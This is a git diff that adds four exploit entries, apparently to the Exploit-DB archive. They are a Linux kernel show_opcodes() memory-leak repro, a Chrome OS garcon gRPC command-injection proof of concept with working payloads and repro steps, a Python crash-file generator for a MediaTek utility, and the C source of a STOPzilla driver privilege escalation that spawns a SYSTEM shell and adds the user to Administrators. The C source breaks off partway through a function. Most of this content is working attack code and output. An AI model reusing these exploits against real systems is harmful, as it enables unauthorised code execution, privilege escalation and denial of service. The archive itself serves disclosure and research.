diff --git a/exploits/linux/dos/45405.txt b/exploits/linux/dos/45405.txt
new file mode 100644
index 000000000..07d3853df
--- /dev/null
+++ b/exploits/linux/dos/45405.txt
@@ -0,0 +1,96 @@
+There is a missing address check in both show_opcodes() callers.
+show_opcodes() is mostly used by the kernel to print the raw
+instruction bytes surrounding an instruction that generated an
+unexpected exception; however, sometimes it is also used to
+print userspace instructions.
+Because the userspace address isn't checked against TASK_SIZE_MAX, if userspace
+faults on a kernel address, the kernel can dump data from a user-controlled
+address into dmesg.
+
+show_opcodes() has two callers:
+ - since commit ba54d856a9d8 (first in 4.18): show_signal_msg() shows userspace
+   instructions when userspace e.g. segfaults
+ - show_ip() is used when the kernel detects some sort of bug; this means that
+   to trigger it, you need some way to at least trigger a WARN() or so
+
+Repro for the first variant:
+
+=========================
+user@debian:~/segfault$ sudo grep core_pattern /proc/kallsyms
+ffffffff9ae34180 D core_pattern
+ffffffff9be99500 t _GLOBAL__sub_I_65535_1_core_pattern
+ffffffff9bff2860 t _GLOBAL__sub_D_65535_0_core_pattern
+user@debian:~/segfault$ cat segfault.c
+int main(void) {
+	void (*fn)(void) = (void*)0xffffffff9ae34180;
+	fn();
+}
+user@debian:~/segfault$ gcc -o segfault segfault.c
+user@debian:~/segfault$ ./segfault 
+Segmentation fault
+user@debian:~/segfault$ sudo dmesg | tail -n2
+[19511.957855] segfault[2622]: segfault at ffffffff9ae34180 ip ffffffff9ae34180 sp 00007ffe0adf1568 error 15
+[19511.962055] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=========================
+
+Note the "<63> 6f 72 65 00" - that's "core\0".
+
+Repro for the second variant:
+
+Patch the kernel like this to get an easy way to trigger a WARN() in the right
+context:
+=========================
+diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
+index b9123c497e0a..fab40edd4c9e 100644
+--- a/arch/x86/mm/fault.c
++++ b/arch/x86/mm/fault.c
+@@ -891,6 +891,7 @@ __bad_area_nosemaphore(struct pt_regs *regs, unsigned long error_code,
+                tsk->thread.trap_nr     = X86_TRAP_PF;
+ 
+                force_sig_info_fault(SIGSEGV, si_code, address, tsk, pkey, 0);
++                WARN(1, "TESTING WARN()");
+ 
+                return;
+        }
+=========================
+
+Then run the same repro code as before (with the core_pattern address fixed up).
+Result:
+=========================
+[  125.564041] segfault[1602]: segfault at ffffffff854340c0 ip ffffffff854340c0 sp 00007ffd4cc7a568 error 15
+[  125.569923] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+[  125.576859] ------------[ cut here ]------------
+[  125.578406] TESTING WARN()
+[  125.578439] WARNING: CPU: 6 PID: 1602 at arch/x86/mm/fault.c:894 __bad_area_nosemaphore+0x147/0x270
+[  125.582172] Modules linked in: bpfilter
+[  125.583394] CPU: 6 PID: 1602 Comm: segfault Tainted: G        W         4.18.0+ #108
+[  125.585811] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[  125.588410] RIP: 0010:__bad_area_nosemaphore+0x147/0x270
+[  125.590078] Code: 48 89 d9 48 89 ea 44 89 e6 48 c7 83 30 0b 00 00 0e 00 00 00 bf 0b 00 00 00 e8 f5 eb ff ff 48 c7 c7 00 61 66 84 e8 79 11 05 00 <0f> 0b 48 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f c3 48 83 c4 28 4c
+[  125.595779] RSP: 0018:ffff8801cb3b7e18 EFLAGS: 00010286
+[  125.597426] RAX: 0000000000000000 RBX: ffff8801cbb9e000 RCX: 0000000000000000
+[  125.599605] RDX: 0000000000000001 RSI: dffffc0000000000 RDI: ffffffff86678ea0
+[  125.601800] RBP: ffffffff854340c0 R08: ffffed003d873ed5 R09: ffffed003d873ed5
+[  125.603935] R10: 0000000000000001 R11: ffffed003d873ed4 R12: 0000000000000001
+[  125.606113] R13: 0000000000000000 R14: 0000000000000015 R15: ffff8801cb3b7f58
+[  125.608250] FS:  00007fe30d518700(0000) GS:ffff8801ec380000(0000) knlGS:0000000000000000
+[  125.610608] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[  125.612331] CR2: ffffffff854340c0 CR3: 00000001d563e001 CR4: 00000000003606e0
+[  125.614470] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[  125.616607] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[  125.618736] Call Trace:
+[  125.619475]  __do_page_fault+0x133/0x780
+[  125.620646]  ? mm_fault_error+0x1b0/0x1b0
+[  125.622236]  ? async_page_fault+0x8/0x30
+[  125.623388]  async_page_fault+0x1e/0x30
+[  125.624526] RIP: 0033:core_pattern+0x0/0x880
+[  125.625786] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+[  125.631208] RSP: 002b:00007ffd4cc7a568 EFLAGS: 00010202
+[  125.632737] RAX: ffffffff854340c0 RBX: 0000000000000000 RCX: 0000000000000000
+[  125.635039] RDX: 00007ffd4cc7a678 RSI: 00007ffd4cc7a668 RDI: 0000000000000001
+[  125.637088] RBP: 00007ffd4cc7a580 R08: 0000562d395106f0 R09: 00007fe30d323cb0
+[  125.639153] R10: 0000000000000000 R11: 00007fe30d0d23c0 R12: 0000562d39510530
+[  125.641183] R13: 00007ffd4cc7a660 R14: 0000000000000000 R15: 0000000000000000
+[  125.643221] ---[ end trace fb20716f9d6369bd ]---
+
+=========================
\ No newline at end of file
diff --git a/exploits/linux/local/45407.txt b/exploits/linux/local/45407.txt
new file mode 100644
index 000000000..43160faea
--- /dev/null
+++ b/exploits/linux/local/45407.txt
@@ -0,0 +1,291 @@
+======================= BUG DESCRIPTION =======================
+There is a variety of RPC communication channels between the Chrome OS host
+system and the crosvm guest. This bug report focuses on communication on TCP
+port 8889, which is used by the "garcon" service.
+
+Among other things, garcon is responsible for:
+ - sending URLs to be opened from the guest to the host
+ - telling the host which applications (more precisely, .desktop files) are
+   installed in the guest, so that the host can display them in the launcher
+ - telling the guest to launch applications when the user clicks on stuff in the
+   launcher
+
+garcon uses gRPC, which is an RPC protocol that sends protobufs over plaintext
+HTTP/2. (Other system components communicate with the VM over gRPC-over-vsock,
+but garcon uses gRPC-over-TCP.) For some command types, the TCP connection is
+initiated by the host; for others, it is initiated by the guest. Both guest and
+host are listening on [::]:8889; however, the iptables rules of the host prevent
+an outside host from simply connecting to those sockets.
+
+However, Chrome OS apps running on the host (and I think also Android apps, but
+I haven't tested that) are not affected by such restrictions. This means that a
+Chrome OS app with the "Exchange data with any device on the local network or
+internet" permission can open a gRPC socket to the guest's garcon (no
+authentication required) and send a vm_tools.container.Garcon.LaunchApplication
+RPC call to the guest. This RPC call takes two arguments:
+
+  // Request protobuf for launching an application in the container.
+  message LaunchApplicationRequest {
+    // The ID of the application to launch. This should correspond to an
+    // identifier for a .desktop file available in the container.
+    string desktop_file_id = 1;
+
+    // Files to pass as arguments when launching the application, if any, given
+    // as absolute paths within the container's filesystem.
+    repeated string files = 2;
+  }
+
+"desktop_file_id" is actually a relative path to a .desktop file without the
+".desktop". One preinstalled .desktop file in the VM is for the VIM editor.
+"files" is an array of "paths" that should be provided to the application as
+arguments - but actually, you can just pass in arbitrary arguments this way.
+This only works for applications whose .desktop files permit passing arguments,
+but vim.desktop does permit that.
+
+VIM permits passing a VIM command to be executed on startup using the "--cmd"
+flag, and a VIM command that starts with an exclamation mark is interpreted as
+a shell command.
+
+So in summary, you can execute arbitrary shell commands by sending a gRPC like
+this to the VM:
+vm_tools.container.Garcon.LaunchApplication({
+  desktop_file_id: 'vim',
+  files: [
+    '--cmd',
+    '!id>/tmp/owned'
+  ]
+})
+
+For my PoC, since I didn't want to try directly speaking gRPC from inside a
+Chrome app, I instead built an app that forwards the garcon port to the outside
+network, and then connected to garcon from a normal Linux workstation.
+Repro instructions are at the bottom of this bug report, under
+"REPRO INSTRUCTIONS", but first I'll list a few other things about crosvm that
+look interesting from a security perspective.
+
+Because of this issue, and because of the routing issue described below, I
+strongly recommend getting rid of TCP-based communication with the VM entirely.
+The various other inter-VM socket types that are already used should be more
+than sufficient.
+
+
+
+======================= RANDOM OBSERVATIONS =======================
+This section lists a bunch of things that I haven't written full PoCs for so far,
+but that look interesting or bad from a security perspective:
+
+------------------- ROUTING TABLE -------------------
+It is possible for a malicious wifi router to get packets from the host-side
+garcon RPC endpoint. You might be able to do bad stuff to a Chrome OS
+device over the network using this, but I haven't fully tested this yet.
+
+Normally, when you connect the Chrome OS device to a wifi network, the routing
+table looks as follows:
+
+localhost / # route -n
+Kernel IP routing table
+Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
+0.0.0.0         192.168.246.1   0.0.0.0         UG    1      0        0 wlan0
+100.115.92.0    0.0.0.0         255.255.255.252 U     0      0        0 arcbr0
+100.115.92.4    0.0.0.0         255.255.255.252 U     0      0        0 vmtap0
+100.115.92.192  100.115.92.6    255.255.255.240 UG    0      0        0 vmtap0
+192.168.246.0   0.0.0.0         255.255.255.0   U     0      0        0 wlan0
+
+Routing precedence depends on prefix length; more specific routes take
+precedence over the default route. The 100.115.92.192/28 route is the most
+specific one for traffic to the VM at 100.115.92.204, so that is the route used
+for RPC calls to that IP address.
+
+However, the wifi router can supply routing information that influences the
+routing table. By modifying the wifi router's settings and reconnecting the
+Chrome OS device, I get the following routing table in Chrome OS:
+
+localhost / # route -n
+Kernel IP routing table
+Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
+0.0.0.0         100.115.92.201  0.0.0.0         UG    1      0        0 wlan0
+8.8.8.8         100.115.92.201  255.255.255.255 UGH   0      0        0 wlan0
+100.115.92.0    0.0.0.0         255.255.255.252 U     0      0        0 arcbr0
+100.115.92.4    0.0.0.0         255.255.255.252 U     0      0        0 vmtap0
+100.115.92.192  100.115.92.6    255.255.255.240 UG    0      0        0 vmtap0
+100.115.92.200  0.0.0.0         255.255.255.248 U     0      0        0 wlan0
+
+Now the 100.115.92.200/29 route pointing to wlan0 takes precedence over the
+legitimate 100.115.92.192/28 route. I then told my router to respond to ARP
+queries for 100.115.92.204 (the VM's IP) and ran wireshark on the wifi router
+while connecting the ChromeOS device to it. I observed a TCP ACK packet coming
+in on port 8889, from 100.115.92.5, with the following payload:
+
+00000000  00 00 19 01 04 00 00 00  09 c7 c6 be c4 c3 c2 c1   ........ ........
+00000010  c0 00 0c 67 72 70 63 2d  74 69 6d 65 6f 75 74 02   ...grpc- timeout.
+00000020  32 53 00 00                                        2S..
+
+I also got a TCP SYN packet on port 2222 (that's the port on which OpenSSH
+listens in the VM).
+
+------------------- SSHFS -------------------
+When the user wishes to access the guest's filesystem from the host, sshfs is
+used - a FUSE filesystem that uses ssh to interact with sftp-server on the
+remote side.
+sshfs runs with CAP_SYS_CHOWN, CAP_SETGID, CAP_SETUID and CAP_SYS_ADMIN, and
+those privileges are even inherited by the ssh process.
+
+------------------- VIRTIO WAYLAND -------------------
+The crosvm host process implements a virtio protocol for Wayland. This is
+described as follows in the guest kernel driver:
+
+* Virtio Wayland (virtio_wl or virtwl) is a virtual device that allows a guest
+* virtual machine to use a wayland server on the host transparently (to the
+* host).  This is done by proxying the wayland protocol socket stream verbatim
+* between the host and guest over 2 (recv and send) virtio queues. The guest
+* can request new wayland server connections to give each guest wayland client
+* a different server context. Each host connection's file descriptor is exposed
+* to the guest as a virtual file descriptor (VFD). Additionally, the guest can
+* request shared memory file descriptors which are also exposed as VFDs. These
+* shared memory VFDs are directly writable by the guest via device memory
+* injected by the host. Each VFD is sendable along a connection context VFD and
+* will appear as ancillary data to the wayland server, just like a message from
+* an ordinary wayland client. When the wayland server sends a shared memory
+* file descriptor to the client (such as when sending a keymap), a VFD is
+* allocated by the device automatically and its memory is injected into as
+* device memory.
+
+Note the "verbatim" - as far as I can tell, the host component is not filtering
+anything, but just plumbs the wayland traffic straight into the
+/run/chrome/wayland-0 socket, on which the chrome browser process is listening.
+If I read the code correctly, the low-level parsing of wayland RPCs is then
+performed using the C code in libwayland, while the high-level handling of a
+bunch of RPCs is done in C++ code in Chrome in src/components/exo/wayland/.
+
+
+
+======================= REPRO INSTRUCTIONS =======================
+Tested on: "10820.0.0 (Official Build) dev-channel eve"
+
+Switch your Chrome OS victim machine to the dev channel so that the Linux VM
+feature becomes available.
+
+Set up a wifi network on which direct connections between machines are permitted,
+and connect the victim device to it.
+
+Open the Chrome OS settings. Enable "Linux (Beta)", wait for the install process
+to complete, then launch crosvm by clicking the Terminal icon in the launcher.
+
+In the guest OS terminal, determine the container's IP address with "ip addr".
+For me, the address is 100.115.92.204, but it seems to change when you
+reinstall the container.
+
+On the attacker machine, run
+"socat -d TCP-LISTEN:1335,reuseaddr TCP-LISTEN:1336,reuseaddr".
+This is just a TCP server that copies data between a client on TCP port 1335
+(must connect first) and a client on TCP port 1336.
+
+On the host, unzip garcon_forwarder.zip and load it as unpacked app. Then
+open "garcon forwarder" from the launcher, fill in the correct IP addresses, and
+press "run". You should see a little bit of hexdump appearing in the app.
+
+On the attacker machine, install nodejs, then, in a folder containing
+container_guest.proto:
+
+$ npm install grpc
+[...]
+$ npm install @grpc/proto-loader
+[...]
+$ node
+> var grpc = require('grpc');
+undefined
+> var protoLoader = require('@grpc/proto-loader');
+undefined
+> var packageDefinition = protoLoader.loadSync('./container_guest.proto', {keepCase: true, longs: String, enums: String, defaults: true, oneofs: true});
+undefined
+> var protoDescriptor = grpc.loadPackageDefinition(packageDefinition);
+undefined
+> var stub = new protoDescriptor.vm_tools.container.Garcon('localhost:1336', grpc.credentials.createInsecure());
+undefined
+> stub.launchApplication({desktop_file_id:'vim',files:['--cmd','!id>/tmp/owned']}, function() {console.log(arguments)});
+ClientUnaryCall {
+  domain: 
+   Domain {
+     domain: null,
+     _events: 
+      { removeListener: [Function: updateExceptionCapture],
+        newListener: [Function: updateExceptionCapture],
+        error: [Function: debugDomainError] },
+     _eventsCount: 3,
+     _maxListeners: undefined,
+     members: [] },
+  _events: {},
+  _eventsCount: 0,
+  _maxListeners: undefined,
+  call: 
+   InterceptingCall {
+     next_call: InterceptingCall { next_call: null, requester: [Object] },
+     requester: undefined } }
+> [Arguments] { '0': null, '1': { success: true, failure_reason: '' } }
+
+
+At this point, in the garcon forwarder app, you should see this:
+
+activating...
+connected to garcon over socket 16
+connected to attacker over socket 17
+on socket 16, received:
+ 00 00 12 04 00 00 00 00 00 00 04 00 00 ff ff 00 |................|
+ 06 00 00 40 00 fe 03 00 00 00 01 00 00 04 08 00 |...@............|
+ 00 00 00 00 7f ff 00 00                         |........|
+on socket 17, received:
+ 50 52 49 20 2a 20 48 54 54 50 2f 32 2e 30 0d 0a |PRI * HTTP/2.0..|
+ 0d 0a 53 4d 0d 0a 0d 0a 00 00 24 04 00 00 00 00 |..SM......$.....|
+ 00 00 02 00 00 00 00 00 03 00 00 00 00 00 04 00 |................|
+ 40 00 00 00 05 00 40 00 00 00 06 00 00 20 00 fe |@.....@...... ..|
+ 03 00 00 00 01 00 00 04 08 00 00 00 00 00 00 3f |...............?|
+ 00 01 00 00 08 06 00 00 00 00 00 00 00 00 00 00 |................|
+ 00 00 00                                        |...|
+on socket 17, received:
+ 00 01 2b 01 04 00 00 00 01 40 07 3a 73 63 68 65 |..+......@.:sche|
+ 6d 65 04 68 74 74 70 40 07 3a 6d 65 74 68 6f 64 |me.http@.:method|
+ 04 50 4f 53 54 40 0a 3a 61 75 74 68 6f 72 69 74 |.POST@.:authorit|
+ 79 0e 6c 6f 63 61 6c 68 6f 73 74 3a 31 33 33 36 |y.localhost:1336|
+ 40 05 3a 70 61 74 68 2c 2f 76 6d 5f 74 6f 6f 6c |@.:path,/vm_tool|
+ 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 47 61 72 63 |s.container.Garc|
+ 6f 6e 2f 4c 61 75 6e 63 68 41 70 70 6c 69 63 61 |on/LaunchApplica|
+ 74 69 6f 6e 40 02 74 65 08 74 72 61 69 6c 65 72 |tion@.te.trailer|
+ 73 40 0c 63 6f 6e 74 65 6e 74 2d 74 79 70 65 10 |s@.content-type.|
+ 61 70 70 6c 69 63 61 74 69 6f 6e 2f 67 72 70 63 |application/grpc|
+ 40 0a 75 73 65 72 2d 61 67 65 6e 74 3c 67 72 70 |@.user-agent<grp|
+ 63 2d 6e 6f 64 65 2f 31 2e 31 33 2e 30 20 67 72 |c-node/1.13.0 gr|
+ 70 63 2d 63 2f 36 2e 30 2e 30 2d 70 72 65 31 20 |pc-c/6.0.0-pre1 |
+ 28 6c 69 6e 75 78 3b 20 63 68 74 74 70 32 3b 20 |(linux; chttp2; |
+ 67 6c 6f 72 69 6f 73 61 29 40 14 67 72 70 63 2d |gloriosa)@.grpc-|
+ 61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 15 |accept-encoding.|
+ 69 64 65 6e 74 69 74 79 2c 64 65 66 6c 61 74 65 |identity,deflate|
+ 2c 67 7a 69 70 40 0f 61 63 63 65 70 74 2d 65 6e |,gzip@.accept-en|
+ 63 6f 64 69 6e 67 0d 69 64 65 6e 74 69 74 79 2c |coding.identity,|
+ 67 7a 69 70 00 00 04 08 00 00 00 00 01 00 00 00 |gzip............|
+ 05 00 00 21 00 01 00 00 00 01 00 00 00 00 1c 0a |...!............|
+ 03 76 69 6d 12 05 2d 2d 63 6d 64 12 0e 21 69 64 |.vim..--cmd..!id|
+ 3e 2f 74 6d 70 2f 6f 77 6e 65 64 00 00 04 08 00 |>/tmp/owned.....|
+ 00 00 00 00 00 00 00 05                         |........|
+on socket 16, received:
+ 00 00 00 04 01 00 00 00 00 00 00 08 06 01 00 00 |................|
+ 00 00 00 00 00 00 00 00 00 00                   |..........|
+on socket 16, received:
+ 00 00 58 01 04 00 00 00 01 40 07 3a 73 74 61 74 |..X......@.:stat|
+ 75 73 03 32 30 30 40 0c 63 6f 6e 74 65 6e 74 2d |us.200@.content-|
+ 74 79 70 65 10 61 70 70 6c 69 63 61 74 69 6f 6e |type.application|
+ 2f 67 72 70 63 40 14 67 72 70 63 2d 61 63 63 65 |/grpc@.grpc-acce|
+ 70 74 2d 65 6e 63 6f 64 69 6e 67 15 69 64 65 6e |pt-encoding.iden|
+ 74 69 74 79 2c 64 65 66 6c 61 74 65 2c 67 7a 69 |tity,deflate,gzi|
+ 70 00 00 07 00 00 00 00 00 01 00 00 00 00 02 08 |p...............|
+ 01 00 00 0f 01 05 00 00 00 01 40 0b 67 72 70 63 |..........@.grpc|
+ 2d 73 74 61 74 75 73 01 30                      |-status.0|
+
+
+Now, in the Linux VM, you can see the created file:
+
+gjannhtest1@penguin:~$ cat /tmp/owned
+uid=1000(gjannhtest1) gid=1000(gjannhtest1) groups=1000(gjannhtest1),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),44(video),46(plugdev),100(users)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45407.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/45398.py b/exploits/windows/dos/45398.py
new file mode 100755
index 000000000..8eaf627b0
--- /dev/null
+++ b/exploits/windows/dos/45398.py
@@ -0,0 +1,24 @@
+# Exploit Title: MediaTek Wirless Utility rt2870 - Denial of Service (PoC)
+# Autor: Lawrence Amer
+# Date: 2018-09-13
+# Vendor: MediaTek
+# Software url: https://click.pstmrk.it/2ts/d86o2zu8ugzlg.cloudfront.net%2Fmediatek-craft%2Fdrivers%2FRT2770_2870_RT307x.zip/K94pHAI/oTs1/oC6CdN114w
+# Tested on OS: Windows 7 64-bit , 32-bit
+
+# Description: launch program then click on  Add profile setting dialog choose our generate prof file ,
+# succesfully reproduce persistent Denial of service every time launch the program again .
+
+#!/usr/bin/python
+
+buffer ="\x41"*3000
+start = "["
+end = "]"
+payload = start+buffer+end
+try:
+    f=open("poc.prof","w")
+    print "[+] Creating %s Byet evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] file created !"
+except:
+     print "File cannot be created !"
\ No newline at end of file
diff --git a/exploits/windows/local/45401.c b/exploits/windows/local/45401.c
new file mode 100644
index 000000000..dbb8854e2
--- /dev/null
+++ b/exploits/windows/local/45401.c
@@ -0,0 +1,506 @@
+/*
+# Exploit Title: STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
+# Date: 2018-09-13
+# Author: Parvez Anwar (@parvezghh)
+# Vendor Homepage: https://www.stopzilla.com/
+# Software link: https://download.stopzilla.com/binaries/stopzilla/auto_installer/STOPzillaAntiMalware.msi
+# Tested Version: 6.5.2.59
+# Driver Version: 3.0.23.0 - szkg64.sys
+# Tested on OS: 64bit Windows 7 and Windows 10 (1803) 
+# CVE ID: N/A
+# Vendor fix url   - No response from vendor 
+# Fixed Version    - 0day
+# Fixed driver ver - 0day
+# https://www.greyhathacker.net/?p=1025
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+#include <winternl.h>
+#include <sddl.h>
+
+#pragma comment(lib,"winsta.lib")
+#pragma comment(lib,"advapi32.lib")
+
+#define SystemHandleInformation 16
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)
+
+void WINAPI WinStationSwitchToServicesSession();
+
+
+typedef unsigned __int64 QWORD;
+
+
+typedef struct _SID_BUILTIN
+{
+     UCHAR Revision;
+     UCHAR SubAuthorityCount;
+     SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
+     ULONG SubAuthority[2];
+} SID_BUILTIN, *PSID_BUILTIN;
+
+
+typedef struct _SID_INTEGRITY
+{
+     UCHAR Revision;
+     UCHAR SubAuthorityCount;
+     SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
+     ULONG SubAuthority[1];
+} SID_INTEGRITY, *PSID_INTEGRITY;
+
+
+typedef NTSYSAPI NTSTATUS (NTAPI *_ZwCreateToken)(
+     OUT PHANDLE TokenHandle,
+     IN ACCESS_MASK DesiredAccess,
+     IN POBJECT_ATTRIBUTES ObjectAttributes,
+     IN TOKEN_TYPE Type,
+     IN PLUID AuthenticationId,
+     IN PLARGE_INTEGER ExpirationTime,
+     IN PTOKEN_USER User,
+     IN PTOKEN_GROUPS Groups,
+     IN PTOKEN_PRIVILEGES Privileges,
+     IN PTOKEN_OWNER Owner,
+     IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
+     IN PTOKEN_DEFAULT_DACL DefaultDacl,
+     IN PTOKEN_SOURCE Source
+);
+
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
+{
+     ULONG       ProcessId;
+     UCHAR       ObjectTypeNumber;
+     UCHAR       Flags;
+     USHORT      Handle;
+     QWORD       Object;
+     ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+
+typedef struct _SYSTEM_HANDLE_INFORMATION 
+{
+     ULONG NumberOfHandles;
+     SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
+     ULONG SystemInformationClass,
+     PVOID SystemInformation,
+     ULONG SystemInformationLength,
+     PULONG ReturnLength);
+
+
+
+int GetWindowsVersion()
+{
+    int            ver = 0;
+    OSVERSIONINFO  osvi;
+
+
+    ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
+    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+
+    GetVersionEx(&osvi);
+
+    if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 1) ver = 1; // Windows 7
+    if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) ver = 2; // Windows 10
+
+    return ver;
+}
+
+
+
+int spawnShell(HANDLE hTokenElevated)
+{
+    STARTUPINFO          si;     
+    PROCESS_INFORMATION  pi;
+
+  
+    ZeroMemory(&si, sizeof(STARTUPINFO));
+    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
+    si.cb = sizeof(STARTUPINFO);
+    si.lpDesktop = "WinSta0\\Default";
+       
+    if (!CreateProcessAsUser(hTokenElevated, NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
+    {
+        printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
+        return -1;
+    }
+    printf("\n[+] Executed command successfully");	
+
+    printf("\n[*] Switching session . . .\n\n");	
+    WinStationSwitchToServicesSession();    	
+   
+    return 0;
+}
+
+
+
+int AddAccountToAdminGroup(HANDLE hTokenElevated)
+{
+    STARTUPINFO          si;     
+    PROCESS_INFORMATION  pi;
+    DWORD                currentusersize;
+    char                 currentuser[100];
+    char                 netcommand[MAX_PATH];            
+
+ 
+    ZeroMemory(&si, sizeof(STARTUPINFO));
+    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
+    si.cb = sizeof(STARTUPINFO);
+
+    currentusersize = sizeof(currentuser);
+
+    if (!GetUserName(currentuser, &currentusersize))
+    {
+        printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
+        return -1;
+    }
+
+    printf("\n[*] Adding current user '%s' account to the local administrators group", currentuser);
+
+    sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);        
+       
+    if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
+    {
+        printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
+        return -1;
+    }
+    printf("\n[+] Executed command successfully\n");		
+   
+    return 0;
+}
+
+
+
+PTOKEN_PRIVILEGES SetPrivileges()
+{
+    PTOKEN_PRIVILEGES   privileges;
+    LUID                luid;
+    int                 NumOfPrivileges = 5;   
+    int                 nBufferSize;  
+
+                 
+    nBufferSize = sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES) * NumOfPrivileges;   
+    privileges = (PTOKEN_PRIVILEGES) LocalAlloc(LPTR, nBufferSize);  
+
+    privileges->PrivilegeCount = NumOfPrivileges;
+
+    LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid);
+    privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+    privileges->Privileges[0].Luid = luid;
+    
+    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
+    privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
+    privileges->Privileges[1].Luid = luid;    
+
+    LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &luid);
+    privileges->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED;
+    privileges->Privileges[2].Luid = luid;	
+
+    LookupPrivilegeValue(NULL, SE_TAKE_OWNERSHIP_NAME, &luid);
+    privileges->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED;
+    privileges->Privileges[3].Luid = luid;	
+
+    LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid);
+    privileges->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED;
+    privileges->Privileges[4].Luid = luid;
+    
+    return privileges;	   	
+}
+
+
+
+PSID GetLocalSystemSID()
+{
+    PSID                       psid = NULL;
+    SID_IDENTIFIER_AUTHORITY   sidAuth = SECURITY_NT_AUTHORITY;
+	
+
+    if (AllocateAndInitializeSid(&sidAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &psid) == FALSE)
+    {  
+        printf("\n[-] AllocateAndInitializeSid failed %d\n", GetLastError());  
+        return NULL;
+    }  
+
+    return psid;
+}
+
+
+
+LPVOID GetInfoFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS type)
+{
+    DWORD    dwLengthNeeded;
+    LPVOID   lpData = NULL;
+
+
+    if (!GetTokenInformation(hToken, type, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
+    {
+        printf("\n[-] Failed to initialize GetTokenInformation %d", GetLastError());
+        return NULL;
+    }
+
+    lpData = (LPVOID)LocalAlloc(LPTR, dwLengthNeeded);
+    GetTokenInformation(hToken, type, lpData, dwLengthNeeded, &dwLengthNeeded);      
+
+    return lpData;
+}
+
+
+
+QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) 
+{
+    _NtQuerySystemInformation   NtQuerySystemInformation;
+    PSYSTEM_HANDLE_INFORMATION  pSysHandleInfo; 
+    ULONG                       i;
+    PSYSTEM_HANDLE              pHandle;
+    QWORD                       TokenAddress = 0;       
+    DWORD                       nSize = 4096;
+    DWORD                       nReturn; 
+    BOOL                        tProcess;    
+    HANDLE                      hToken;
+
+
+    if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
+    {
+        printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
+        return -1;
+    }
+
+    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
+ 	
+    if (!NtQuerySystemInformation)
+    {
+        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
+        return -1;  
+    }
+
+    do
+    {  
+        nSize += 4096;
